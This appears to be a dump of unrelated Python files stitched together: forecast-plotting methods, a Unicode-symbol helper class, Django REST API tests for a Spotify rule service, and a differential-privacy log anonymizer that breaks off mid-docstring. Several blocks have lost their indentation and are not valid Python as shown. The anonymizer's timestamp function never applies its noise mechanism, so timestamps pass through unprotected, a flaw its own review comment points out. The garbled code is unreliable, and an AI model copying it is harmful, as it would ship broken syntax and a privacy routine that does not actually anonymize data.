            trend = self.piecewise_logistic(t, cap, deltas, k, m,
                                            changepoint_ts)
        return trend * self.y_scale
def make_future_dataframe(self, periods, freq='D', include_history=True):
last_date = self.history['ds'].max()
dates = pd.date_range(
start=last_date,
periods=periods + 1, # An extra in case we include start
freq=freq)
dates = dates[dates > last_date] # Drop start if equals last_date
dates = dates[:periods] # Return correct number of periods
if include_history:
dates = np.concatenate((np.array(self.history['ds']), dates))
return pd.DataFrame({'ds': dates})
    def plot(self, fcst, uncertainty=True, xlabel='ds', ylabel='y'):
        """Plot the Prophet forecast.

        Parameters
        ----------
        fcst: pd.DataFrame output of self.predict.
        uncertainty: Optional boolean to plot uncertainty intervals.
        xlabel: Optional label name on X-axis
        ylabel: Optional label name on Y-axis

        Returns
        -------
        a matplotlib figure.
        """
        fig = plt.figure(facecolor='w', figsize=(10, 6))
        ax = fig.add_subplot(111)
        # Observed history as black dots, forecast as a blue line.
        ax.plot(self.history['ds'].values, self.history['y'], 'k.')
        ax.plot(fcst['ds'].values, fcst['yhat'], ls='-', c='#0072B2')
        if 'cap' in fcst:
            # Carrying capacity (logistic growth) as a dashed line.
            ax.plot(fcst['ds'].values, fcst['cap'], ls='--', c='k')
        if uncertainty:
            ax.fill_between(fcst['ds'].values, fcst['yhat_lower'],
                            fcst['yhat_upper'], color='#0072B2',
                            alpha=0.2)
        ax.grid(True, which='major', c='gray', ls='-', lw=1, alpha=0.2)
        ax.set_xlabel(xlabel)
        ax.set_ylabel(ylabel)
        fig.tight_layout()
        return fig
    def plot_components(self, fcst, uncertainty=True):
        """Plot the Prophet forecast components.

        Will plot whichever are available of: trend, holidays, weekly
        seasonality, and yearly seasonality.

        Parameters
        ----------
        fcst: pd.DataFrame output of self.predict.
        uncertainty: Optional boolean to plot uncertainty intervals.

        Returns
        -------
        a list of matplotlib artists.
        """
        # Identify components to be plotted
        components = [('plot_trend', True),
                      ('plot_holidays', self.holidays is not None),
                      ('plot_weekly', 'weekly' in fcst),
                      ('plot_yearly', 'yearly' in fcst)]
        components = [(plot, cond) for plot, cond in components if cond]
        npanel = len(components)

        # NOTE(review): with npanel == 1, plt.subplots returns a single Axes
        # (not an array), so the zip below would fail — confirm whether the
        # trend-only case is reachable in practice.
        fig, axes = plt.subplots(npanel, 1, facecolor='w',
                                 figsize=(9, 3 * npanel))

        artists = []
        for ax, plot in zip(axes,
                            [getattr(self, plot) for plot, _ in components]):
            artists += plot(fcst, ax=ax, uncertainty=uncertainty)

        fig.tight_layout()
        return artists
    def plot_trend(self, fcst, ax=None, uncertainty=True):
        """Plot the trend component of the forecast.

        Parameters
        ----------
        fcst: pd.DataFrame output of self.predict.
        ax: Optional matplotlib Axes to plot on.
        uncertainty: Optional boolean to plot uncertainty intervals.

        Returns
        -------
        a list of matplotlib artists
        """
        artists = []
        if not ax:
            fig = plt.figure(facecolor='w', figsize=(10, 6))
            ax = fig.add_subplot(111)
        artists += ax.plot(fcst['ds'].values, fcst['trend'], ls='-',
                           c='#0072B2')
        if 'cap' in fcst:
            # Carrying capacity (logistic growth) as a dashed line.
            artists += ax.plot(fcst['ds'].values, fcst['cap'], ls='--', c='k')
        if uncertainty:
            artists += [ax.fill_between(
                fcst['ds'].values, fcst['trend_lower'], fcst['trend_upper'],
                color='#0072B2', alpha=0.2)]
        ax.grid(True, which='major', c='gray', ls='-', lw=1, alpha=0.2)
        ax.xaxis.set_major_locator(MaxNLocator(nbins=7))
        ax.set_xlabel('ds')
        ax.set_ylabel('trend')
        return artists
    def plot_holidays(self, fcst, ax=None, uncertainty=True):
        """Plot the holidays component of the forecast.

        Parameters
        ----------
        fcst: pd.DataFrame output of self.predict.
        ax: Optional matplotlib Axes to plot on. One will be created if this
            is not provided.
        uncertainty: Optional boolean to plot uncertainty intervals.

        Returns
        -------
        a list of matplotlib artists
        """
        artists = []
        if not ax:
            fig = plt.figure(facecolor='w', figsize=(10, 6))
            ax = fig.add_subplot(111)
        # Sum the per-holiday columns into one overall holiday effect.
        holiday_comps = self.holidays['holiday'].unique()
        y_holiday = fcst[holiday_comps].sum(1)
        y_holiday_l = fcst[[h + '_lower' for h in holiday_comps]].sum(1)
        y_holiday_u = fcst[[h + '_upper' for h in holiday_comps]].sum(1)
        # NOTE the above CI calculation is incorrect if holidays overlap
        # in time. Since it is just for the visualization we will not
        # worry about it now.
        artists += ax.plot(fcst['ds'].values, y_holiday, ls='-',
                           c='#0072B2')
        if uncertainty:
            artists += [ax.fill_between(fcst['ds'].values,
                                        y_holiday_l, y_holiday_u,
                                        color='#0072B2', alpha=0.2)]
        ax.grid(True, which='major', c='gray', ls='-', lw=1, alpha=0.2)
        ax.xaxis.set_major_locator(MaxNLocator(nbins=7))
        ax.set_xlabel('ds')
        ax.set_ylabel('holidays')
        return artists
def plot_weekly(self, fcst, ax=None, uncertainty=True):
"""Plot the weekly component of the forecast.
Parameters
----------
fcst: pd.DataFrame output of self.predict.
ax: Optional matplotlib Axes to plot on. One will be created if this
is not provided.
uncertainty: Optional boolean to plot uncertainty intervals.
Returns
-------
a list of matplotlib artists
"""
artists = []
if not ax:
fig = plt.figure(facecolor='w', figsize=(10, 6))
ax = fig.add_subplot(111)
df_s = fcst.copy()
df_s['dow'] = df_s['ds'].dt.weekday_name
df_s = df_s.groupby('dow').first()
days = pd.date_range(start='2017-01-01', periods=7).weekday_name
y_weekly = [df_s.loc[d]['weekly'] for d in days]
y_weekly_l = [df_s.loc[d]['weekly_lower'] for d in days]
y_weekly_u = [df_s.loc[d]['weekly_upper'] for d in days]
artists += ax.plot(range(len(days)), y_weekly, ls='-',
c='#0072B2')
if uncertainty:
artists += [ax.fill_between(range(len(days)),
y_weekly_l, y_weekly_u,
color='#0072B2', alpha=0.2)]
ax.grid(True, which='major', c='gray', ls='-', lw=1, alpha=0.2)
ax.set_xticks(range(len(days)))
ax.set_xticklabels(days)
ax.set_xlabel('Day of week')
ax.set_ylabel('weekly')
return artists
    def plot_yearly(self, fcst, ax=None, uncertainty=True):
        """Plot the yearly component of the forecast.

        Parameters
        ----------
        fcst: pd.DataFrame output of self.predict.
        ax: Optional matplotlib Axes to plot on. One will be created if
            this is not provided.
        uncertainty: Optional boolean to plot uncertainty intervals.

        Returns
        -------
        a list of matplotlib artists
        """
        artists = []
        if not ax:
            fig = plt.figure(facecolor='w', figsize=(10, 6))
            ax = fig.add_subplot(111)
        df_s = fcst.copy()
        # Collapse onto a single (leap) reference year to overlay all years.
        df_s['doy'] = df_s['ds'].map(lambda x: x.strftime('2000-%m-%d'))
        df_s = df_s.groupby('doy').first().sort_index()
        artists += ax.plot(pd.to_datetime(df_s.index), df_s['yearly'], ls='-',
                           c='#0072B2')
        if uncertainty:
            artists += [ax.fill_between(
                pd.to_datetime(df_s.index), df_s['yearly_lower'],
                df_s['yearly_upper'], color='#0072B2', alpha=0.2)]
        ax.grid(True, which='major', c='gray', ls='-', lw=1, alpha=0.2)
        # Tick every other month, on the first of the month.
        months = MonthLocator(range(1, 13), bymonthday=1, interval=2)
        ax.xaxis.set_major_formatter(DateFormatter('%B %-d'))
        ax.xaxis.set_major_locator(months)
        ax.set_xlabel('Day of year')
        ax.set_ylabel('yearly')
        return artists
# fb-block 9
|
class Chars:
    """Unicode symbols that are useful in code and annoying to search for repeatedly."""
    # punctuation
    nbsp = u'\u00A0'  # non-breaking space
    zwidthspace = u'\u200B'  # zero-width space
    thinspace = u'\u2009'
    hairspace = u'\u200A'
    emspace = u'\u2003'
    hyphen = '‐'  # proper unicode hyphen
    nbhyphen = '‑'  # non-breaking hyphen
    fig = '‒'  # figure dash, ex in phone numbers
    en = '–'  # en dash, ex in ranges
    em = '—'  # em dash, like a semicolon
    ellipsis = '…'  # only 1 character, which is helpful
    middots = '⋯'
    middot = '·'
    rsq, lsq, rdq, ldq = '’', '‘', '”', '“'
    # math
    ell = 'ℓ'
    micro, degree, angstrom = 'µ', '°', 'Å'
    minus, times, plusminus = '−', '×', '±'
    inf, null = '∞', '⌀'
    prop, approx, leq, geq = '∝', '≈', '≤', '≥'
    nott, implies, iff, forall, exists, notexists = '¬', '⇒', '⇔', '∀', '∃', '∄'
    vee, wedge, cup, cap = '∨', '∧', '∪', '∩'
    isin, contains, complement = '∈', '∋', '∁'
    precedes, succeeds = '≺', '≻'
    prime, partial, integral = '′', '∂', '∫'
    # info marks
    bullet = '•'
    dagger, ddagger = '†', '‡'
    star, snowflake = '★', '⁕'
    info, caution, warning, donotenter, noentry = '🛈', '☡', '⚠', '⛔', '🚫'
    trash, skull, atom, radiation, bioharzard = '🗑', '☠', '⚛', '☢', '☣'
    biohazard = '☣'  # correctly spelled alias; bioharzard kept for compatibility
    corners = '⛶'
    # misc / UI
    left, right, cycle, fatright = '←', '→', '⟳', '⮕'
    check, x = '✔', '✘'
    smile, frown, happy, worried, confused = '🙂', '☹', '😃', '😟', '😕'
    circle, square, triangle = '⚪', '◼', '▶'
    vline, hline, vdots = '|', '―', '⁞'
    bar, pipe, brokenbar, tech, zigzag = '―', '‖', '¦', '⌇', '⦚'
    # brackets
    langle, rangle = '⟨', '⟩'
    lshell, rshell = '⦗', '⦘'
    # Bug fix: rdbracket was '〛' (the mate of '〚'), which does not pair
    # with ldbracket '⟦'; '⟧' matches the pair documented in dbracketed.
    ldbracket, rdbracket = '⟦', '⟧'
    ldshell, rdshell = '〘', '〙'
    ldparen, rdparen = '⸨', '⸩'
    ldangle, rdangle = '《', '》'
    # greek
    alpha, beta, gamma, delta, epsilon, eta, theta, zeta, kappa = 'α', 'β', 'γ', 'δ', 'ε', 'η', 'θ', 'ζ', 'κ'
    Gamma, Delta, Pi, Sigma, Omega = 'Γ', 'Δ', 'Π', 'Σ', 'Ω'
    lamba = 'λ'  # spelled wrong (deliberately: `lambda` is a keyword)
    nu, mu, xi, tau, pi, sigma, phi, psi, omega = 'ν', 'μ', 'ξ', 'τ', 'π', 'σ', 'φ', 'ψ', 'ω'
    varphi = 'φ'

    @staticmethod
    def squoted(s: str) -> str:
        """Wrap a string in single quotes."""
        return Chars.lsq + str(s) + Chars.rsq

    @staticmethod
    def dquoted(s: str) -> str:
        """Wrap a string in double quotes."""
        return Chars.ldq + str(s) + Chars.rdq

    @staticmethod
    def angled(s: str) -> str:
        """Wrap a string in angled brackets."""
        return Chars.langle + str(s) + Chars.rangle

    @staticmethod
    def dangled(s: str) -> str:
        """Wrap a string in double brackets."""
        return Chars.ldangle + str(s) + Chars.rdangle

    @staticmethod
    def parened(s: str) -> str:
        """Wrap a string in parentheses."""
        return '(' + str(s) + ')'

    @staticmethod
    def bracketed(s: str) -> str:
        """Wrap a string in square brackets."""
        return '[' + str(s) + ']'

    @staticmethod
    def braced(s: str) -> str:
        """Wrap a string in curly braces."""
        return '{' + str(s) + '}'

    @staticmethod
    def shelled(s: str) -> str:
        """Wrap a string in tortoise shell brackets (〔 〕)."""
        return '〔' + str(s) + '〕'

    @staticmethod
    def dbracketed(s: str) -> str:
        """Wrap a string in double square brackets (⟦ ⟧)."""
        return Chars.ldbracket + str(s) + Chars.rdbracket


__all__ = ['Chars']
<gh_stars>0
import logging
from unittest import mock
from django.contrib.auth.models import User
from django.test import SimpleTestCase, TestCase
from django.urls import reverse
from freezegun import freeze_time
from rest_framework.test import APIClient
from api.service_checks import ServiceStatus
from data.exceptions import BadSpotifyTrackID
from data.models import Rule, SongSequenceMember
class TestRuleList(TestCase):
    """Tests for the rule list endpoint ('rule-list')."""

    def setUp(self):
        # Squelch logging for these tests.
        logging.disable(logging.CRITICAL)
        self.test_user_1 = User.objects.create(username="test1")
        self.test_user_2 = User.objects.create(username="test2")
        self.test_user_3 = User.objects.create(username="test3")
        # Freeze creation times so the ordering assertions below are
        # deterministic.
        with freeze_time("2020-08-15"):
            self.test_rule_1 = Rule.objects.create(
                owner=self.test_user_1, trigger_song_spotify_id="foo"
            )
        with freeze_time("2020-08-17"):
            self.test_rule_2 = Rule.objects.create(
                owner=self.test_user_2, trigger_song_spotify_id="bar"
            )
            self.test_rule_3 = Rule.objects.create(
                owner=self.test_user_1, trigger_song_spotify_id="baz"
            )

    def tearDown(self):
        # Reenable logging when tests finish.
        logging.disable(logging.NOTSET)

    def test_get_only_owner_rules(self):
        # An authenticated user should only see their own rules.
        client = APIClient()
        client.force_authenticate(self.test_user_1)
        response = client.get(reverse("rule-list"))
        # Make sure that we only got two rules, the ones owned by test_user_1.
        self.assertEqual(len(response.data), 2)
        # Make sure that they are ordered by descending date created.
        self.assertEqual(response.data[0]["id"], self.test_rule_3.id)
        self.assertEqual(response.data[1]["id"], self.test_rule_1.id)

    def test_no_rules(self):
        # A user with no rules gets an empty list, not an error.
        client = APIClient()
        client.force_authenticate(self.test_user_3)
        response = client.get(reverse("rule-list"))
        self.assertEqual(response.data, [])

    def test_unauthenticated(self):
        # Anonymous requests are rejected.
        client = APIClient()
        response = client.get(reverse("rule-list"))
        self.assertEqual(response.status_code, 403)
class TestRuleDetail(TestCase):
def setUp(self):
# Squelch logging for these tests.
logging.disable(logging.CRITICAL)
self.test_user_1 = User.objects.create(username="test1")
self.test_user_2 = User.objects.create(username="test2")
self.test_rule_1 = Rule.objects.create(
owner=self.test_user_1,
trigger_song_spotify_id="foo",
is_active=True,
)
def tearDown(self):
# Reenable logging when tests finish.
logging.disable(logging.NOTSET)
def test_get(self):
client = APIClient()
client.force_authenticate(self.test_user_1)
response = client.get(
reverse("rule-detail", kwargs={"pk": self.test_rule_1.id})
)
self.assertEqual(response.status_code, 200)
def test_get_someone_elses_rule(self):
client = APIClient()
client.force_authenticate(self.test_user_2)
response = client.get(
reverse("rule-detail", kwargs={"pk": self.test_rule_1.id})
)
self.assertEqual(response.status_code, 403)
def test_get_unauthenticated(self):
client = APIClient()
response = client.get(
reverse("rule-detail", kwargs={"pk": self.test_rule_1.id})
)
self.assertEqual(response.status_code, 403)
def test_get_not_found_authenticated(self):
client = APIClient()
client.force_authenticate(self.test_user_1)
rule_id = self.test_rule_1.id
self.test_rule_1.delete()
response = client.get(reverse("rule-detail", kwargs={"pk": rule_id}))
self.assertEqual(response.status_code, 404)
def test_get_not_found_unauthenticated(self):
client = APIClient()
rule_id = self.test_rule_1.id
self.test_rule_1.delete()
response = client.get(reverse("rule-detail", kwargs={"pk": rule_id}))
self.assertEqual(response.status_code, 403)
@mock.patch("api.serializers.Rule.set_name")
def test_put(self, mock_set_name):
client = APIClient()
client.force_authenticate(self.test_user_1)
response = client.put(
reverse("rule-detail", kwargs={"pk": self.test_rule_1.id}),
{
"trigger_song_spotify_id": "bar",
"song_sequence": [],
"is_active": False,
},
format="json",
)
self.test_rule_1.refresh_from_db()
self.assertEqual(response.status_code, 200)
self.assertEqual(self.test_rule_1.trigger_song_spotify_id, "bar")
self.assertFalse(self.test_rule_1.is_active)
mock_set_name.assert_called_once()
@mock.patch("api.serializers.Rule.set_name")
def test_put_bad_track(self, mock_set_name):
client = APIClient()
client.force_authenticate(self.test_user_1)
mock_set_name.side_effect = BadSpotifyTrackID("terrible_track_id")
response = client.put(
reverse("rule-detail", kwargs={"pk": self.test_rule_1.id}),
{
"trigger_song_spotify_id": "terrible_track_id",
"song_sequence": [],
"is_active": False,
},
format="json",
)
self.test_rule_1.refresh_from_db()
self.assertEqual(response.status_code, 400)
self.assertIn("terrible_track_id", response.data[0])
mock_set_name.assert_called_once()
# Ensure atomicity
self.assertEqual(self.test_rule_1.trigger_song_spotify_id, "foo")
self.assertTrue(self.test_rule_1.is_active)
def test_put_someone_elses_rule(self):
client = APIClient()
client.force_authenticate(self.test_user_2)
response = client.put(
reverse("rule-detail", kwargs={"pk": self.test_rule_1.id}),
{
"trigger_song_spotify_id": "bar",
"song_sequence": [],
"is_active": False,
},
format="json",
)
self.test_rule_1.refresh_from_db()
self.assertEqual(response.status_code, 403)
self.assertEqual(self.test_rule_1.trigger_song_spotify_id, "foo")
self.assertTrue(self.test_rule_1.is_active)
def test_put_unauthenticated(self):
    """Anonymous PUT is rejected with 403 and the rule stays unchanged."""
    client = APIClient()
    response = client.put(
        reverse("rule-detail", kwargs={"pk": self.test_rule_1.id}),
        {
            "trigger_song_spotify_id": "bar",
            "song_sequence": [],
            "is_active": False,
        },
        format="json",
    )
    self.test_rule_1.refresh_from_db()
    self.assertEqual(response.status_code, 403)
    self.assertEqual(self.test_rule_1.trigger_song_spotify_id, "foo")
    self.assertTrue(self.test_rule_1.is_active)
def test_delete(self):
    """The owner can delete their own rule (204, rule gone)."""
    owner_client = APIClient()
    owner_client.force_authenticate(self.test_user_1)
    url = reverse("rule-detail", kwargs={"pk": self.test_rule_1.id})
    response = owner_client.delete(url)
    self.assertEqual(response.status_code, 204)
    self.assertEqual(Rule.objects.count(), 0)
def test_delete_someone_elses_rule(self):
    """A different authenticated user cannot delete the rule; it survives."""
    client = APIClient()
    client.force_authenticate(self.test_user_2)
    response = client.delete(
        reverse("rule-detail", kwargs={"pk": self.test_rule_1.id})
    )
    self.assertEqual(response.status_code, 403)
    self.assertEqual(Rule.objects.count(), 1)
def test_delete_unauthenticated(self):
    """Anonymous DELETE is rejected with 403; the rule survives."""
    client = APIClient()
    response = client.delete(
        reverse("rule-detail", kwargs={"pk": self.test_rule_1.id})
    )
    self.assertEqual(response.status_code, 403)
    self.assertEqual(Rule.objects.count(), 1)
class TestCreateRule(TestCase):
    """Tests for the rule creation endpoint (``rule-create``)."""

    def setUp(self):
        # Squelch logging for these tests.
        logging.disable(logging.CRITICAL)
        self.test_user_1 = User.objects.create(username="test1")

    def tearDown(self):
        # Reenable logging when tests finish.
        logging.disable(logging.NOTSET)

    def test_get(self):
        """GET is not allowed on the create endpoint (405)."""
        client = APIClient()
        client.force_authenticate(self.test_user_1)
        response = client.get(reverse("rule-create"))
        self.assertEqual(response.status_code, 405)

    @mock.patch("api.serializers.Rule.set_name")
    def test_post(self, mock_set_name):
        """An authenticated POST creates exactly one rule with the given fields."""
        client = APIClient()
        client.force_authenticate(self.test_user_1)
        response = client.post(
            reverse("rule-create"),
            {
                "trigger_song_spotify_id": "foo",
                "song_sequence": [],
                "is_active": False,
            },
            format="json",
        )
        self.assertEqual(response.status_code, 201)
        new_rule = Rule.objects.get()  # Implicitly tests there's only one Rule
        self.assertEqual(new_rule.trigger_song_spotify_id, "foo")
        self.assertFalse(new_rule.is_active)
        # set_name is mocked so no external name lookup happens.
        mock_set_name.assert_called_once()

    @mock.patch("api.serializers.Rule.set_name")
    def test_post_bad_track(self, mock_set_name):
        """A BadSpotifyTrackID from set_name yields 400 and no rule is persisted."""
        client = APIClient()
        client.force_authenticate(self.test_user_1)
        mock_set_name.side_effect = BadSpotifyTrackID("terrible_track_id")
        response = client.post(
            reverse("rule-create"),
            {
                "trigger_song_spotify_id": "terrible_track_id",
                "song_sequence": [],
                "is_active": False,
            },
            format="json",
        )
        self.assertEqual(response.status_code, 400)
        self.assertIn("terrible_track_id", response.data[0])
        mock_set_name.assert_called_once()
        # Ensure atomicity
        self.assertEqual(Rule.objects.count(), 0)

    def test_post_duplicate_rule(self):
        """Posting a rule whose trigger song already exists is rejected with 400."""
        client = APIClient()
        client.force_authenticate(self.test_user_1)
        Rule.objects.create(owner=self.test_user_1, trigger_song_spotify_id="dupe")
        response = client.post(
            reverse("rule-create"),
            {
                "trigger_song_spotify_id": "dupe",
                "song_sequence": [],
                "is_active": False,
            },
            format="json",
        )
        self.assertEqual(response.status_code, 400)

    def test_post_unauthenticated(self):
        """Anonymous POSTs are rejected (403) and create nothing."""
        client = APIClient()
        response = client.post(
            reverse("rule-create"),
            {
                "trigger_song_spotify_id": "foo",
                "song_sequence": [],
                "is_active": False,
            },
            format="json",
        )
        self.assertEqual(response.status_code, 403)
        self.assertEqual(Rule.objects.count(), 0)
class TestServiceStatus(SimpleTestCase):
    """Tests for the health-check endpoint (``service-status``).

    ``run_checks`` is mocked throughout so no real checks execute.
    """

    def setUp(self):
        # Squelch logging for these tests.
        logging.disable(logging.CRITICAL)

    def tearDown(self):
        # Reenable logging when tests finish.
        logging.disable(logging.NOTSET)

    @mock.patch("api.views.run_checks")
    def test_ok(self, mock_run_checks):
        """OK status is reported with HTTP 200 and the check info echoed back."""
        mock_run_checks.return_value = (
            ServiceStatus.OK,
            {"checks": "pass"},
        )
        client = APIClient()
        response = client.get(reverse("service-status"))
        self.assertEqual(response.status_code, 200)
        self.assertEqual(
            response.data,
            {
                "status": "OK",
                "info": {"checks": "pass"},
            },
        )

    @mock.patch("api.views.run_checks")
    def test_warning(self, mock_run_checks):
        """WARNING status still returns HTTP 200."""
        mock_run_checks.return_value = (
            ServiceStatus.WARNING,
            {"checks": "warning"},
        )
        client = APIClient()
        response = client.get(reverse("service-status"))
        self.assertEqual(response.status_code, 200)
        self.assertEqual(
            response.data,
            {
                "status": "WARNING",
                "info": {"checks": "warning"},
            },
        )

    @mock.patch("api.views.run_checks")
    def test_critical(self, mock_run_checks):
        """CRITICAL status maps to HTTP 503 (service unavailable)."""
        mock_run_checks.return_value = (
            ServiceStatus.CRITICAL,
            {"checks": "critical"},
        )
        client = APIClient()
        response = client.get(reverse("service-status"))
        self.assertEqual(response.status_code, 503)
        self.assertEqual(
            response.data,
            {
                "status": "CRITICAL",
                "info": {"checks": "critical"},
            },
        )

    @mock.patch("api.views.run_checks")
    def test_bad_status(self, mock_run_checks):
        """An unrecognized status value raises ValueError in the view."""
        mock_run_checks.return_value = ("???", {})
        client = APIClient()
        with self.assertRaises(ValueError):
            client.get(reverse("service-status"))
class TestLogout(TestCase):
    """Tests for the session logout endpoint (``logout``)."""

    def setUp(self):
        # Squelch logging for these tests.
        logging.disable(logging.CRITICAL)
        self.test_user = User.objects.create(username="test")

    def tearDown(self):
        # Reenable logging when tests finish.
        logging.disable(logging.NOTSET)

    def test_logout(self):
        """Logging out invalidates the session for subsequent authenticated views."""
        client = APIClient()
        client.force_login(self.test_user)
        response = client.post(reverse("logout"))
        self.assertEqual(response.status_code, 200)
        # Try getting a view that needs auth.
        response = client.get(reverse("rule-list"))
        self.assertEqual(response.status_code, 403)

    def test_unauthenticated(self):
        """Logging out without being logged in is rejected with 403."""
        client = APIClient()
        response = client.post(reverse("logout"))
        self.assertEqual(response.status_code, 403)
class TestDeleteAccount(TestCase):
    """Tests for account deletion (``delete-account``), including data cascade."""

    def setUp(self):
        # Squelch logging for these tests.
        logging.disable(logging.CRITICAL)
        self.test_user = User.objects.create(username="test")
        # A rule plus a song-sequence member owned by the user, to verify cascade.
        self.test_rule = Rule.objects.create(
            owner=self.test_user, trigger_song_spotify_id="foo"
        )
        self.test_ssm = SongSequenceMember.objects.create(
            rule=self.test_rule, song_spotify_id="bar", sequence_number=0
        )

    def tearDown(self):
        # Reenable logging when tests finish.
        logging.disable(logging.NOTSET)

    def test_delete(self):
        """Deleting the account logs the user out and removes the user and all data."""
        client = APIClient()
        client.force_login(self.test_user)
        response = client.delete(reverse("delete-account"))
        self.assertEqual(response.status_code, 200)
        # Try getting a view that needs auth.
        response = client.get(reverse("rule-list"))
        self.assertEqual(response.status_code, 403)
        # Make sure that the user was deleted.
        self.assertEqual(User.objects.count(), 0)
        # Also test that the user's data was deleted.
        self.assertEqual(Rule.objects.count(), 0)
        self.assertEqual(SongSequenceMember.objects.count(), 0)

    def test_unauthenticated(self):
        """Anonymous requests to delete-account are rejected with 403."""
        client = APIClient()
        response = client.post(reverse("delete-account"))
        self.assertEqual(response.status_code, 403)
|
import diffprivlib.mechanisms as privacyMechanisms
from datetime import timedelta
import datetime
class AttributeAnonymizier:
    """Anonymize event attributes and timestamps of an event log with
    differential-privacy mechanisms from ``diffprivlib``.

    Booleans go through a Binary mechanism, numerics through a bounded
    Laplace mechanism, categoricals through an Exponential mechanism with a
    uniform utility list, and timestamps through a bounded Laplace mechanism
    whose sensitivity/bounds are derived per activity pair.
    """

    def __init__(self):
        # Attribute key under which each event stores its timestamp (XES convention).
        self.__timestamp = "time:timestamp"
        self.__blacklist = self.__getBlacklistOfAttributes()
        # Keys used inside the per-attribute domain dictionaries.
        self.__sensitivity = "sensitivity"
        self.__max = "max"
        self.__min = "min"
        # Collects the (anonymized) "InfectionSuspected" value of each trace's first event.
        self.__infectionSuspected = list()

    def __getBlacklistOfAttributes(self):
        # Attributes that must never be randomised (identifiers / structural keys).
        blacklist = set()
        blacklist.add("concept:name")
        blacklist.add(self.__timestamp)
        blacklist.add("variant")
        blacklist.add("EventID")
        blacklist.add("OfferID")
        blacklist.add("matricola")
        return blacklist

    def __retrieveAttributeDomains(self, distributionOfAttributes, dataTypesOfAttributes):
        """Compute min/max/sensitivity for every numeric (int/float) attribute."""
        domains = dict()
        for attribute in dataTypesOfAttributes.keys():
            if dataTypesOfAttributes[attribute] in (int, float):
                domain = dict()
                domain[self.__max] = max(distributionOfAttributes[attribute])
                domain[self.__min] = min(distributionOfAttributes[attribute])
                domain[self.__sensitivity] = abs(domain[self.__max] - domain[self.__min])
                domains[attribute] = domain
        return domains

    def __determineDataType(self, distributionOfAttributes):
        """Infer each non-blacklisted attribute's type from its first observed value."""
        dataTypesOfAttributes = dict()
        for attribute in distributionOfAttributes.keys():
            if attribute not in self.__blacklist:
                dataTypesOfAttributes[attribute] = type(distributionOfAttributes[attribute][0])
        return dataTypesOfAttributes

    def __getPotentialValues(self, distributionOfAttributes, dataTypesOfAttributes):
        """Collect the set of observed values for every string-typed attribute."""
        potentialValues = dict()
        for attribute in dataTypesOfAttributes:
            if dataTypesOfAttributes[attribute] is str:
                distribution = distributionOfAttributes[attribute]
                values = set(distribution)
                potentialValues[attribute] = values
        return potentialValues

    def __setupBooleanMechanism(self, epsilon):
        # One shared Binary mechanism flipping between the labels "True"/"False".
        binaryMechanism = privacyMechanisms.Binary()
        binaryMechanism.set_epsilon(epsilon)
        binaryMechanism.set_labels(str(True), str(False))
        return binaryMechanism

    def __anonymizeAttribute(self, value, mechanism):
        """Randomise a single value; pass through unchanged when no mechanism exists."""
        isBoolean = False
        isInt = False
        if mechanism is not None:
            # Binary mechanism works on string labels, so booleans are stringified first.
            if type(value) is bool:
                isBoolean = True
                value = str(value)
            if type(value) is int:
                isInt = True
            value = mechanism.randomise(value)
            if isBoolean:
                # eval turns the "True"/"False" label back into a bool.
                value = eval(value)
            if isInt:
                # Laplace output is a float; round back to the original int type.
                value = int(round(value))
        return value

    def __addBooleanMechansisms(self, epsilon, mechanisms, dataTypesOfAttributes):
        binaryMechanism = self.__setupBooleanMechanism(epsilon)
        for attribute in dataTypesOfAttributes.keys():
            if dataTypesOfAttributes[attribute] is bool:
                mechanisms[attribute] = binaryMechanism
        return mechanisms

    def __addNumericMechanisms(self, epsilon, mechanisms, domains):
        # One bounded Laplace mechanism per numeric attribute, bounded to its observed domain.
        for attribute in domains.keys():
            sensitivity = domains[attribute][self.__sensitivity]
            lowerDomainBound = domains[attribute][self.__min]
            upperDomainBound = domains[attribute][self.__max]
            laplaceMechanism = privacyMechanisms.LaplaceBoundedDomain()
            laplaceMechanism.set_epsilon(epsilon)
            laplaceMechanism.set_sensitivity(sensitivity)
            laplaceMechanism.set_bounds(lowerDomainBound, upperDomainBound)
            mechanisms[attribute] = laplaceMechanism
        return mechanisms

    def __setupUniformUtitlityList(self, potentialValues):
        # Every value pair gets utility 1, i.e. all outputs are equally preferred.
        utilityList = [[x, y, 1] for x in potentialValues for y in potentialValues]
        return utilityList

    def __addCatergoricalMechanisms(self, epsilon, mechanisms, dataTypesOfAttributes, potentialValues):
        for attribute in dataTypesOfAttributes.keys():
            if dataTypesOfAttributes[attribute] is str:
                utilityList = self.__setupUniformUtitlityList(potentialValues[attribute])
                if len(utilityList) > 0:
                    exponentialMechanism = privacyMechanisms.Exponential()
                    exponentialMechanism.set_epsilon(epsilon)
                    exponentialMechanism.set_utility(utilityList)
                    mechanisms[attribute] = exponentialMechanism
        return mechanisms

    def __getTimestamp(self, trace, eventNr, allTimestamps):
        """Return the event's timestamp, clamped to the log's min/max at trace edges."""
        if eventNr <= 0:
            return min(allTimestamps)
        elif eventNr >= len(trace):
            return max(allTimestamps)
        else:
            return trace[eventNr][self.__timestamp]

    def __anonymizeTimeStamps(self, timestamp, previousTimestamp, nextTimestamp, sensitivity, minTimestampDifference, mechanism):
        upperPotentialDifference = (nextTimestamp - previousTimestamp).total_seconds()
        currentDifference = (timestamp - previousTimestamp).total_seconds()
        if upperPotentialDifference < 0:
            upperPotentialDifference = currentDifference
        mechanism.set_sensitivity(sensitivity).set_bounds(minTimestampDifference, upperPotentialDifference)
        # NOTE(review): mechanism.randomise(...) is never invoked here, so the
        # event keeps its true inter-event time and the bounds set above have no
        # effect; presumably `currentDifference` was meant to be randomised
        # before being re-applied -- confirm against the intended algorithm.
        timestamp = previousTimestamp + timedelta(seconds=currentDifference)
        return timestamp

    def __setupMechanisms(self, epsilon, distributionOfAttributes):
        """Build the per-attribute mechanism table for one epsilon value."""
        mechanisms = dict()
        dataTypesOfAttributes = self.__determineDataType(distributionOfAttributes)
        mechanisms = self.__addBooleanMechansisms(epsilon, mechanisms, dataTypesOfAttributes)
        domains = self.__retrieveAttributeDomains(distributionOfAttributes, dataTypesOfAttributes)
        mechanisms = self.__addNumericMechanisms(epsilon, mechanisms, domains)
        potentialValues = self.__getPotentialValues(distributionOfAttributes, dataTypesOfAttributes)
        mechanisms = self.__addCatergoricalMechanisms(epsilon, mechanisms, dataTypesOfAttributes, potentialValues)
        # Timestamp mechanism gets only epsilon here; sensitivity and bounds are
        # set per event in __anonymizeTimeStamps.
        mechanisms[self.__timestamp] = privacyMechanisms.LaplaceBoundedDomain().set_epsilon(epsilon)
        return mechanisms

    def __getTimestampDomain(self, trace, eventNr, distributionOfTimestamps, allTimestampDifferences):
        """Return (sensitivity, min difference) for the current activity pair, with caching.

